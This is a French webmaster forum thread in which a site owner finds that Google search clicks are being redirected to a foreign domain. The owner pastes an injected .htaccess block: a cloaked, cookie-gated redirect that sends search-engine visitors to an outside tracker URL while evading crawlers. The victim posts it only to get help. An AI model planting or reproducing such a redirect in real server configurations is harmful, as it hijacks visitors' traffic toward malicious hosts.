Gros probleme avec Google

Discussion dans 'Crawl et indexation Google, sitemaps' créé par rootshell, 18 Juin 2012.

1. rootshell
    rootshell Nouveau WRInaute
    Inscrit:
    21 Mai 2006
    J'aime reçus:
    0
  2. lambi521
    lambi521 WRInaute passionné
    Inscrit:
    15 Juin 2010
    J'aime reçus:
    0
    Quand je clic ça me met adresse introuvable

3. rootshell
    Inscrit:
    21 Mai 2006
    J'aime reçus:
    0
    Oui ca redirge vers un ancien site

4. -Romu-
    -Romu- WRInaute occasionnel
    Inscrit:
    19 Avril 2012
    J'aime reçus:
    0
    Et bien, si tu as changer de NdD, il fallait faire une redirection permanente vert le nouveau !
    Google n'est pas devient ;-)

Si ton NdD est http://thousandmilitary.com
    Revoie la config de ton serveur DNS !

5. rootshell
    Inscrit:
    21 Mai 2006
    J'aime reçus:
    0
    Merci de vos informations.

en fait le pb est tout autre, mon nom de domaine et www.val-doise-informatique.fr

mais quand je clic sur le lien google correspondant a mon site (faites la recherche "val doise informatique" dans gg et vous verrez que la première fois cela amène a l'ancien site qui n'as JAMAIS été à moi).

Par contre quand on clic une deuxieme fois de suite sur le lien gg cela amene au bon site vdi ...

6. lambi521
    lambi521 WRInaute passionné
    Inscrit:
    15 Juin 2010
    J'aime reçus:
    0
    Regarde sur ton serveur si tu as un fichier .htaccess à la racine et dis nous ce qu'il y a dedans

Tu t'es peut-être fait hacké mais pour arriver sur une page inaccessible je vois pas trop l'intérêt...

7. rootshell
    Inscrit:
    21 Mai 2006
    J'aime reçus:
    0
    Bingo le fait de voir le htaccess m'as permis de voir le problème

MERCI LAMBI521 !

8. rootshell
    Inscrit:
    21 Mai 2006
    J'aime reçus:
    0
    Par contre c'est un méga bazar le fichier je le copie colle ici car je ne vois pas ce que je doit retirer sans crainte :

Si vous pouviez me dire pour ne pas perdre en référencement ce serez génial :

# exgocgkctswo
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} ^GET$
    RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
    RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
    RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
    RewriteCond %{HTTPS} ^off$
    RewriteRule ^(.*)$ http://thousandmilitary.com/cgi-bin/r.cgi?p=10003&i=4215d3c0&j=333&m=b ... 214c7d1&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0]
    # exgocgkctswo

SetEnv PHP_VER 5
    SetEnv REGISTER_GLOBALS 0

Chargement...